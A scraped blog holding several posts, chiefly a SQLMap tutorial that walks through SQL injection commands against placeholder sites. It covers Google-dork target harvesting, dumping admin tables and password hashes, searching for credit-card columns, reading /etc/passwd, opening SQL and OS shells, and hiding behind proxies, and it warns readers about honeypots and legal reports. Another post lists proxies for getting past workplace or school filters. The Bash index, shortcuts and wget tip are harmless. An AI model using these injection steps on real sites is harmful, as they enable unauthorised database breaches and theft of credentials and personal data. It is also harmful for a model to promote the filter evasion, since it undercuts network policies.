Thursday 26 May 2016

SQLMap Injection with Samples

Hi,

So, here I want to post little about how to use SQLMap in practice.

In my previous post, I’ve shown you how to install SQLMap from GitHub and learn the command options that used most on injection attack.

I’ll start directly from the injection attack samples that used the most command options, so you can practice it further by yourself later.

If you haven’t installed SQLMap, you can read my previous post here:
https://www.blogger.com/blogger.g?blogID=3236000309080110099#editor/target=post;postID=6390705995461280716;onPublishedMenu=allposts;onClosedMenu=allposts;postNum=0;src=postname

# Start SQLMap

$ ./sqlmap.py --update

$ ./sqlmap.py

$ ./sqlmap.py -hh

1. Command option -u

Let’s say, we have target something like:

http://www.domain.com/article.php?id=7

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs

–random-agent: using random browser agent (Firefox, IE, Opera, etc..)
–level: level of injection test to perform (1..5)
–risk: level of injection risk to perform (1..3)
–threads: count of injection attack process thread. Using high number of thread will make the injection attack process run fast, especially in Union, Boolean, Error, Stacked, and Query based type, but avoid using more than 1 thread in Time-based attack.
–batch: make the injection process run automatically, without user input.
–dbs: get database info

That command above will perform attack alternately based on BEUSTQ (Boolean, Error, Union, Stacked, Query, Time), by default. To focus the attack with spesific attack technique, you can set it in the injection command, for example when you do manual injection to this target by doing something like this:

http://www.domain.com/article.php?id=7'

http://www.domain.com/article.php?id=7 and 1=0

and you see there’s an SQL error message on the page, then you might want to set the attack technique with option: –tech=E

Otherwise, if you see nothing, but you are quite sure that there’s an injection point on that page or just want to test the injection, you can leave it the attack technique type to be unset.

2. Command option -g (crawl potential targets from Google results)

With the -g option, we can crawl any potential targets from Google results based on the dork inputted.

Injection command:

$ ./sqlmap.py -g "intext:article.php?id=" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs

To crawl from certain site based on where the country domain registered, eg: .com.sg

$ ./sqlmap.py -g "intext:article.php?id= + site:.com.sg" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs

Ofcourse, you can use any other Google dorks as you wish.

If you see no attack being processed, that means there is no potential injection point that can be injected. Potential injection point of the URL link should contains at least one GET parameter, eg: .php?id=, .asp?pid=, etc..

3. Command option –crawl

Injection command:

$ ./sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --crawl=3 --dbs

That command above will crawl to every links found in certain website and will inject link which has GET parameter in it.

–crawl: crawl through every links in a website page. We use –crawl=3 means it will crawl deeply till the depth of “3″.

For example:

http://www.domain.com, has a menu link called “articles”.

Depth 1: http://www.domain.com/articles
Depth 2: http://www.domain.com/articles/newest/
Depth 3: http://www.domain.com/articles/newest/funny-topics/
Depth 4: http://www.domain.com/articles/newest/funny-topics/author/

Our option –crawl=3 will crawl any links found in depth 1, 2, and 3, but not depth 4. Okay, hope you understand.

You are free to set any crawl depth as you want. But, remember the more you set the crawl depth, the more you will get many links to inject (if it has GET parameter).

4. Command option –forms

Injection command:

$ ./sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --forms --dbs

That command above will try to search for any POST form in the website page. For example: in homepage there will be some forms like search, login forms, etc.

But, how if the POST form are in another page deeply in the website and we don’t know where it is? We can join with the previous command –crawl.

$ ./sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --crawl=3 --forms --dbs

5. Command option –proxy

The proxy option format is: (http|https|socks4|socks5)://url:port

Find some working IP proxy and port, eg: http://hidemyass.com/proxy-list

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --proxy="https://123.123.123.123:3128" --dbs

6. Command option –dbms

Suppose that we’re pretty sure that the target website uses database type MySQL. We can set it in the command with option –dbms=mysql, so that it will be faster in injection attack, rather than rotate through all of database types, like Oracle, MSSQL, etc.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --forms --dbms=mysql --dbs

7. Command option -D, -T, -C

-D: dump database
-T: dump table
-C: dump column

Let’s say we got database name like: sitedb.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T

That command above will enumarate all tables name from certain database that is “sitedb”.

Let’s say we got 15 tables name, one of them is: admin. And we want to enumerate for its columns name.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C

That command above will enumarate all columns name from certain database that is “sitedb” and table “admin”.

Let’s say we got 6 columns name, eg: id, admin_id, admin_pass, admin_fullname, admin_mail, admin_level.

We want to dump all the data in table “admin”.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin --dump

Or if you want to dump only certain columns, like “admin_id” and “admin_pass”.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin_pass --dump

8. Command option –answers

This option is vry useful if you want the attack process run 100% automatically without any user input.

For example, when you are dumping data from certain table (see command option 6 above), SQLMap will automatically try to crack any string that has format like “password hash”.

Eg:

In dumping the table “admin”, you got 3 record rows, those are:

admin:0cc175b9c0f1b6a831c399e269772661
manager:92eb5ffee6ae2fec3ad71c777531578f
staf:4a8a08f09d37b73795649038408b5f33

Since it found field data like “0cc175b9c0f1b6a831c399e269772661″ which has format like MD5-hash, SQLMap will try to crack it automatically using wordlist in dir “txt”. Cracking 3 hashes with only few wordlist, would take a short time. But what if the hashes found are about 10,000 records and the wordlist count is more than 100,000,000 lines?? Wouldn’t it take long time to wait.

The best idea is dump all data first, then the cracking process can be done later separately. For this purpose, we can use command option –answers, to make SQLMap skip “cracking” process.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin-pass --dump --answers="crack=N"

–answer=”crack=N”, we take certain unique particular string from the cracking question, that is “crack”, and we set it to “N” = No.

9. Command option –flush-session

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs --flush-session

That command above will make SQLMap to flush all sessions found from previous injection targetted to certain website. This is very useful when you do injection with T (Time) based attack, as sometimes there’s a lagging connection to the target website.

But, be careful using –flush-session, as it will delete all injection sessions and file for that target. This option means the next injection process will start from zero, as if we never inject the target before.

10. Command option –hex

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin-pass --dump --hex --tech=T

Using –hex option is very useful when the injection process uses T (Time) based. Means that the data being retrieved are converted to HEX (hexadecimal) digits before it starts to deliver. This also to avoid any strange characters being retrieved.

11. Command option –no-cast

“cast” function in MySQL means, to convert a string to a different character set.

Eg:

SELECT CAST(_latin1'test' AS CHAR CHARACTER SET utf8);

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs --no-cast

Note that, we can’t join between –no-cast and –hex option. We have to choose one of them in a command.

12. Command option –dump-all

To dump all databases found, but exclude “information_schema” DB or exclude DBMS system database.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dump-all --exclude-sysdbs

13. Command option –count

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin --count

To count records/rows in a certain table. Very useful if you want to check how many records/rows in a table before dumping it.

14. Command option –start, –end

Let’s say we found table “member” and there are about 24,000 records in it. And we want to dump start from record “1000″ to “2000″.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T member --dump --answers="crack=N" --start=1000 --end=2000

15. Command option –search

Let’s say there are about 90 tables in a certain database, and we want to short our time looking for table contains certain “field name”. Eg: credit_card_type.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb --search="credit_card_type"

It will search through the whole tables in database “sitedb” and find for field name “credit_card_type”.

16. Command option –delay

This option –delay sometime used with T (Time) based attack type, to avoid lagging connection from/to the target and to retrieve data precisely.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --batch --dbs --delay=5 --tech=T

Note, when we use –delay in Time based attack type, there is no “thread” being set. Thread is only 1, by default.

–delay=5, means delay between one attack to next attack is 5 seconds.

17. Command option –common-tables, –common-columns

Suppose we got database name “sitedb”, the database type is MySQL version 4.0. As we know that MySQL version 4 doesn’t have “information_schema” system database, so it will be hard to enumerate the tables/columns name. We gonna use “fuzzing/bruteforcing” technique to get the table and column name.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb --common-tables

That command above will try to bruteforce for the table name based on the tables name list.

Let’s say we have found one table, eg: member. But we don’t have any idea what the column name is. Next, we gonna bruteforce for the column name.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb --common-columns

That command above will try to bruteforce for the column name based on the columns name list.

18. Command option –sql-shell

To prompt for an interactive SQL shell command.

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --sql-shell

It will show an interactive SQL shell command.

For example, we want to make SQL query from table “admin”.

> select count(*) from admin;

You can also use –sql-query directly from the injection command, eg:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --sql-query="select count(*) from admin"

19. Command option –msf-path

To prompt a shell which relates to MSF (Metasploit) Framework. Install MSF first before using this command option.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --msf-path="the_MSF_path_where_it_is_installed"

20. Command option –file-read

To read any (readable) file in the server.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --file-read="/etc/passwd"

21. Command option –tamper

To use tamper for the injection attack. For example, we want to give the injection attack with string “+” for any space character in it. Means it will convert all spaces with string “+”.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs --tamper tamper/space2plus.py

To short the command for tamper link, you can set shortcut link for all tamper scripts in dir “tamper”.

$ ln -s tamper/space2plus.py space2plus.py

Do the same for other tamper scripts you want to make shortcut for it.

22. Command option –users, –passwords, –roles, –privileges, –is-dba

–users: to enumerate all database users
–passwords: to enumerate all database paswords for each of the users
–roles: to enumerate all roles for each of the users
–privileges: to enumerate all privileges for each of the users
–is-dba: to check whether the current database user is a Database Administrator or not

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --users --passwords --roles --privileges --is-dba

Useful if you want to check whether the current database user is a DB Administrator or not, or to check the user has “write” privilege or not. If the user has “write” privilege, then we might has chance to write file on the server. It’s just like “mysql_into_outfile” command.

Okay, I think that’s enough for this post. I’m so sleepy and want to take a rest.

Good luck with your injection.

Note:
- If you do injection with SQLMap from VPS (Virtual Private Server) and process google results, be careful .. sometimes you don’t realize that the target site you’re attacked is a “honeypot“. It’s a trap usually set by security company or internet monitoring company. Once you’re trapped in the honeypot server, it will record all your injection/hacking activities and your IP. Then, the company authority will file for legal report to your hosting company, and you gonna get warning from them very soon. You’re lucky if you only get warning, but if you do that many times, hosting company may block/suspend your VPS service because of illegal activities. So, just be careful with the target you’re trying to hack, you can use proxy IP to cover your real IP.

Using SQLMap for SQL Injection

Hi,

There are many SQL injection (SQLi) tools we can find on the net, some of them are SQL Ninja, SQLMap, Pangolin, Havij, Reiluke Tools, schemafuzz.py, etc.
For me, I have tried all tools mentioned above. And only SQLMap I like most. It has many features for SQL injection, such as tamper and payload. With various kind of tampers, we can handle any tricky SQLi query.
If you have familiar enough with SQLMap, you can skip read this post. Note that, SQLMap needs Python version > 2.6.
1/ Clone SQLMap from GIT repository
$ git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
[sqlmap-dev] can be changed to anything name you want.
2/ Go into SQLMap directory
$ cd sqlmap-dev
Make sqlmap.py executable:
$ chmod +x sqlmap.py
3/ Run SQLMap for the first time
$ ./sqlmap.py
4/ Learn and understand well the command options provided by SQLMap.
$ ./sqlmap.py --help
The most frequently commands you will use are:

-u URL, --url=URL (target URL)
--random-agent (use random agent in injection process)
--tamper (for using tamper when it's needed)
--batch (for batch process, you don't need to enter anything in the command)
--no-cast (turn of payload casting mechanism)
--hex (using hex functions for data retrieval)
--level (level of test to perfom, range 1 - 5)
--risk (risk of test to perform, range 0 - 3)
--text-only (use this if you think most of the web page contents are about 80% text), more faster injection process
--technique (SQLi technique to use, default BEUSTQ)
--time-sec (use this if connection to the web target is taking too long time to load)
--dbs (database name retrieval)
--table (enumerates table name)
--column (enumerates column name)
--threads (thread to use in injection process, recommended 5 .. maximum 10)
--dump (dump data from spesific database)
--dump-all (dump data from all databases)
--exclude-sysdbs (exclude dumping system database, eg: information_schema, mysql)
--user (enumerates all database users)
--password (enumerates all password per database user)
--privileges (enumerates all privileges per database user, we want to check if there's a root with full privileges, eg: FILES privileges to write into web document files)
--roles (enumerates all roles per database user)
--file-read (to read spesific file, eg: /etc/passwd)
--os-shell (to spawn shell into the web target)
--sql-shell (to spawn sql shell and execute sql query command)
--start (start dump from row n)
--stop (stop dump until row n)
--count (to count table row)
-g (to process google dork and get the result as the web target for injection)
--crawl (to crawl all links in certain web URL)
--os-pwn (to prompt for an out-of-band shell, meterpreter or VNC, if you have MSF installed)
--forms (to inject any links contains form page with POST method)
--update (update SQLMap)

And the rest of the commands you can read and learn by yourself.
In Windows environment, just install Python 2.7 and start running SQLMap. You can also use Cygwin to get a UNIX-like environment. If you intend to get SQLMap directly from its GIT repository, don’t forget to install GIT for windows.
SQLMap project on GIT can be found here:
https://github.com/sqlmapproject/sqlmap
Next post will be SQLMap in-practice tutorial. Thanks for reading.

Make Offline Mirror of a Site using `wget`

Sometimes you want to create an offline copy of a site that you can take and view even without internet access. Using wget you can make such copy easily:
wget --mirror --convert-links --adjust-extension --page-requisites 
--no-parent http://example.org
Explanation of the various flags:
  • --mirror – Makes (among other things) the download recursive.
  • --convert-links – convert all the links (also to stuff like CSS stylesheets) to relative, so it will be suitable for offline viewing.
  • --adjust-extension – Adds suitable extensions to filenames (html or css) depending on their content-type.
  • --page-requisites – Download things like CSS style-sheets and images required to properly display the page offline.
  • --no-parent – When recursing do not ascend to the parent directory. It useful for restricting the download to only a portion of the site.
Alternatively, the command above may be shortened:
wget -mkEpnp http://example.org
Note: that the last p is part of np (--no-parent) and hence you see p twice in the flags.

Wednesday 1 January 2014

An A-Z Index of the Bash command line for Linux

An A-Z Index of the Bash command line for Linux.

  alias    Create an alias •
  apropos  Search Help manual pages (man -k)
  apt-get  Search for and install software packages (Debian/Ubuntu)
  aptitude Search for and install software packages (Debian/Ubuntu)
  aspell   Spell Checker
  awk      Find and Replace text, database sort/validate/index
b
  basename Strip directory and suffix from filenames
  bash     GNU Bourne-Again SHell
  bc       Arbitrary precision calculator language
  bg       Send to background
  break    Exit from a loop •
  builtin  Run a shell builtin
  bzip2    Compress or decompress named file(s)
c
  cal      Display a calendar
  case     Conditionally perform a command
  cat      Concatenate and print (display) the content of files
  cd       Change Directory
  cfdisk   Partition table manipulator for Linux
  chgrp    Change group ownership
  chmod    Change access permissions
  chown    Change file owner and group
  chroot   Run a command with a different root directory
  chkconfig System services (runlevel)
  cksum    Print CRC checksum and byte counts
  clear    Clear terminal screen
  cmp      Compare two files
  comm     Compare two sorted files line by line
  command  Run a command - ignoring shell functions •
  continue Resume the next iteration of a loop •
  cp       Copy one or more files to another location
  cron     Daemon to execute scheduled commands
  crontab  Schedule a command to run at a later time
  csplit   Split a file into context-determined pieces
  curl     Transfer data  from or to a server
  cut      Divide a file into several parts
d
  date     Display or change the date & time
  dc       Desk Calculator
  dd       Convert and copy a file, write disk headers, boot records
  ddrescue Data recovery tool
  declare  Declare variables and give them attributes •
  df       Display free disk space
  diff     Display the differences between two files
  diff3    Show differences among three files
  dig      DNS lookup
  dir      Briefly list directory contents
  dircolors Colour setup for `ls'
  dirname  Convert a full pathname to just a path
  dirs     Display list of remembered directories
  dmesg    Print kernel & driver messages
  du       Estimate file space usage
e
  echo     Display message on screen •
  egrep    Search file(s) for lines that match an extended expression
  eject    Eject removable media
  enable   Enable and disable builtin shell commands •
  env      Environment variables
  ethtool  Ethernet card settings
  eval     Evaluate several commands/arguments
  exec     Execute a command
  exit     Exit the shell
  expect   Automate arbitrary applications accessed over a terminal
  expand   Convert tabs to spaces
  export   Set an environment variable
  expr     Evaluate expressions
f
  false    Do nothing, unsuccessfully
  fdformat Low-level format a floppy disk
  fdisk    Partition table manipulator for Linux
  fg       Send job to foreground
  fgrep    Search file(s) for lines that match a fixed string
  file     Determine file type
  find     Search for files that meet a desired criteria
  fmt      Reformat paragraph text
  fold     Wrap text to fit a specified width.
  for      Expand words, and execute commands
  format   Format disks or tapes
  free     Display memory usage
  fsck     File system consistency check and repair
  ftp      File Transfer Protocol
  function Define Function Macros
  fuser    Identify/kill the process that is accessing a file
g
  gawk     Find and Replace text within file(s)
  getopts  Parse positional parameters
  grep     Search file(s) for lines that match a given pattern
  groupadd Add a user security group
  groupdel Delete a group
  groupmod Modify a group
  groups   Print group names a user is in
  gzip     Compress or decompress named file(s)
h
  hash     Remember the full pathname of a name argument
  head     Output the first part of file(s)
  help     Display help for a built-in command •
  history  Command History
  hostname Print or set system name
  htop     Interactive process viewer
i
  iconv    Convert the character set of a file
  id       Print user and group id's
  if       Conditionally perform a command
  ifconfig Configure a network interface
  ifdown   Stop a network interface
  ifup     Start a network interface up
  import   Capture an X server screen and save the image to file
  install  Copy files and set attributes
  ip       Routing, devices and tunnels
j
  jobs     List active jobs •
  join     Join lines on a common field
k
  kill     Kill a process by specifying its PID
  killall  Kill processes by name
l
  less     Display output one screen at a time
  let      Perform arithmetic on shell variables •
  link     Create a link to a file
  ln       Create a symbolic link to a file
  local    Create variables •
  locate   Find files
  logname  Print current login name
  logout   Exit a login shell •
  look     Display lines beginning with a given string
  lpc      Line printer control program
  lpr      Off line print
  lprint   Print a file
  lprintd  Abort a print job
  lprintq  List the print queue
  lprm     Remove jobs from the print queue
  ls       List information about file(s)
  lsof     List open files
m
  make     Recompile a group of programs
  man      Help manual
  mkdir    Create new folder(s)
  mkfifo   Make FIFOs (named pipes)
  mkisofs  Create an hybrid ISO9660/JOLIET/HFS filesystem
  mknod    Make block or character special files
  more     Display output one screen at a time
  most     Browse or page through a text file
  mount    Mount a file system
  mtools   Manipulate MS-DOS files
  mtr      Network diagnostics (traceroute/ping)
  mv       Move or rename files or directories
  mmv      Mass Move and rename (files)
n
  nc       Netcat, read and write data across networks
  netstat  Networking information
  nice     Set the priority of a command or job
  nl       Number lines and write files
  nohup    Run a command immune to hangups
  notify-send  Send desktop notifications
  nslookup Query Internet name servers interactively
o
  open     Open a file in its default application
  op       Operator access
p
  passwd   Modify a user password
  paste    Merge lines of files
  pathchk  Check file name portability
  ping     Test a network connection
  pkill    Kill processes by a full or partial name.
  popd     Restore the previous value of the current directory
  pr       Prepare files for printing
  printcap Printer capability database
  printenv Print environment variables
  printf   Format and print data •
  ps       Process status
  pushd    Save and then change the current directory
  pv       Monitor the progress of data through a pipe
  pwd      Print Working Directory
q
  quota    Display disk usage and limits
  quotacheck Scan a file system for disk usage
r
  ram      ram disk device
  rar      Archive files with compression
  rcp      Copy files between two machines
  read     Read a line from standard input •
  readarray Read from stdin into an array variable •
  readonly Mark variables/functions as readonly
  reboot   Reboot the system
  rename   Rename files
  renice   Alter priority of running processes
  remsync  Synchronize remote files via email
  return   Exit a shell function
  rev      Reverse lines of a file
  rm       Remove files
  rmdir    Remove folder(s)
  rsync    Remote file copy (Synchronize file trees)
s
  screen   Multiplex terminal, run remote shells via ssh
  scp      Secure copy (remote file copy)
  sdiff    Merge two files interactively
  sed      Stream Editor
  select   Accept keyboard input
  seq      Print numeric sequences
  set      Manipulate shell variables and functions
  sftp     Secure File Transfer Program
  shift    Shift positional parameters
  shopt    Shell Options
  shutdown Shutdown or restart linux
  sleep    Delay for a specified time
  slocate  Find files
  sort     Sort text files
  source   Run commands from a file '.'
  split    Split a file into fixed-size pieces
  ssh      Secure Shell client (remote login program)
  stat     Display file or file system status
  strace   Trace system calls and signals
  su       Substitute user identity
  sudo     Execute a command as another user
  sum      Print a checksum for a file
  suspend  Suspend execution of this shell •
  sync     Synchronize data on disk with memory
t
  tail     Output the last part of file
  tar      Store, list or extract files in an archive
  tee      Redirect output to multiple files
  test     Evaluate a conditional expression
  time     Measure Program running time
  timeout  Run a command with a time limit
  times    User and system times
  touch    Change file timestamps
  top      List processes running on the system
  tput     Set terminal-dependent capabilities, color, position
  traceroute Trace Route to Host
  trap     Run a command when a signal is set(bourne)
  tr       Translate, squeeze, and/or delete characters
  true     Do nothing, successfully
  tsort    Topological sort
  tty      Print filename of terminal on stdin
  type     Describe a command •
u
  ulimit   Limit user resources •
  umask    Users file creation mask
  umount   Unmount a device
  unalias  Remove an alias •
  uname    Print system information
  unexpand Convert spaces to tabs
  uniq     Uniquify files
  units    Convert units from one scale to another
  unrar    Extract files from a rar archive
  unset    Remove variable or function names
  unshar   Unpack shell archive scripts
  until    Execute commands (until error)
  uptime   Show uptime
  useradd  Create new user account
  userdel  Delete a user account
  usermod  Modify user account
  users    List users currently logged in
  uuencode Encode a binary file
  uudecode Decode a file created by uuencode
v
  v        Verbosely list directory contents (`ls -l -b')
  vdir     Verbosely list directory contents (`ls -l -b')
  vi       Text Editor
  vmstat   Report virtual memory statistics
w
  wait     Wait for a process to complete •
  watch    Execute/display a program periodically
  wc       Print byte, word, and line counts
  whereis  Search the user's $path, man pages and source files for a program
  which    Search the user's $path for a program file
  while    Execute commands
  who      Print all usernames currently logged in
  whoami   Print the current user id and name (`id -un')
  wget     Retrieve web pages or files via HTTP, HTTPS or FTP
  write    Send a message to another user
x
  xargs    Execute utility, passing constructed argument list(s)
  xdg-open Open a file or URL in the user's preferred application.
  xz       Compress or decompress .xz and .lzma files
  yes      Print a string until interrupted
  zip      Package and compress (archive) files.
  .        Run a command script in the current shell
  !!       Run the last command again
  ###      Comment / Remark

Keyboard Shortcuts for Bash ( Command Shell for Ubuntu, Debian, Suse, Redhat, Linux, etc)

The default shell on most Linux operating systems is called Bash. There are a couple of important hotkeys that you should get familiar with if you plan to spend a lot of time at the command line. These shortcuts will save you a ton of time if you learn them.




Ctrl + A Go to the beginning of the line you are currently typing on
Ctrl + E Go to the end of the line you are currently typing on
Ctrl + L               Clears the Screen, similar to the clear command
Ctrl + U Clears the line before the cursor position. If you are at the end of the line, clears the entire line.
Ctrl + H Same as backspace
Ctrl + R Let’s you search through previously used commands
Ctrl + C Kill whatever you are running
Ctrl + D Exit the current shell
Ctrl + Z Puts whatever you are running into a suspended background process. fg restores it.
Ctrl + W Delete the word before the cursor
Ctrl + K Clear the line after the cursor
Ctrl + T Swap the last two characters before the cursor
Esc + T Swap the last two words before the cursor
Alt + F Move cursor forward one word on the current line
Alt + B Move cursor backward one word on the current line
Tab Auto-complete files and folder names


Note that some of these commands may not work if you are accessing bash through a telnet/ssh session, or depending on how you have your keys mapped.

Breaking down the Proxy Blocking, why not?

Hi there !
Hope u’re all in fine condition yeah.
To spend this sunday holiday, I wrote simple article ’bout internet stuff that may increase our knowledge.
Okay, I wanna explain ’bout how to break down the proxy server blocking in ur network. This trick is really useful for u who the internet connection access is in the back proxy of office, school, company, corporate, etc. I believe that most of u knew what proxy is. Yes !! proxy is a computer server (or perhaps a program application) which receive request from computer client sent to the computer server (like gateway server or internet server). Since it has function to be the middle node between client and server, then the proxy often used for filtering requests under the security rules of his/her network.

The rules set for this proxy, such as :

1. filter request to web page which has malicious content.
2. manage which ports may accessed by the clients and close ports in its network.
3. filter certain keywords which has porn/fraud contents.
and many functions done by the proxy server.
But, have u ever imagine on breaking down that blocking ??
Is it possible to break down proxy blocking ??
The answer is YESS, we can do that !
If there’s a proxy, then there’ll be anti-proxy. Anti-proxy often called by circumventor-proxy. Circumventor is a method on how we broke down the proxy blocking in our local network. Technically, circumventor is a proxy too which located in different computer server.
Btw, there are many many servers in the world that serve proxy server for users. And, these are the lists of website that has circumventor proxy :
 
http://beetlecop.com
http://unblock.w201.100dns.com/free
http://www.LeeProxy.com
http://sgqhz.w26.100dns.com/go
http://www.mmproxy.com
http://freego.homeblock.com
http://gateway.joost.co.uk/
http://tunnel.co.nr/
http://www.fastestproxysite.info/
http://www.hiddencloak.com/
http://www.hiddencloak.com/
http://proxy.marveloustheatre.com/
http://www.veloxproxy.com/
http://proxy.hyperdeathbabies.com/
http://www.sweetproxies.com/submit/
http://tempidentity.com/
http://www.proxypoodle.com/
http://www.searcharticles.in/myspace/
http://www.xp1.info/
http://proxijoy.co.uk/
http://boldproxy.com/
http://www.iwantsurf.com/
http://proxy.rootname.cn/
http://proxy.chuui.jp/
http://www.proxy885.info/
http://www.changeinternet.com/
http://www.hidebliss.com/
http://www.proxyheat.com/
http://www.zaxiproxy.com/
http://www.unblockmath.com/
http://nie.skasowane.pl/gl/
http://anon.browser-security.info/13/
http://www.footballscorelive.com/
http://r.ls.la/p1/
http://www.todaysproxy.com/
http://www.proxyforall.com/
http://bigexploit.info/
http://www.access24h.com/

Tips for using circumventor proxy, use proxy server that has close distance with your location.

Ok…enjoy ur breaking down the proxy blocking !!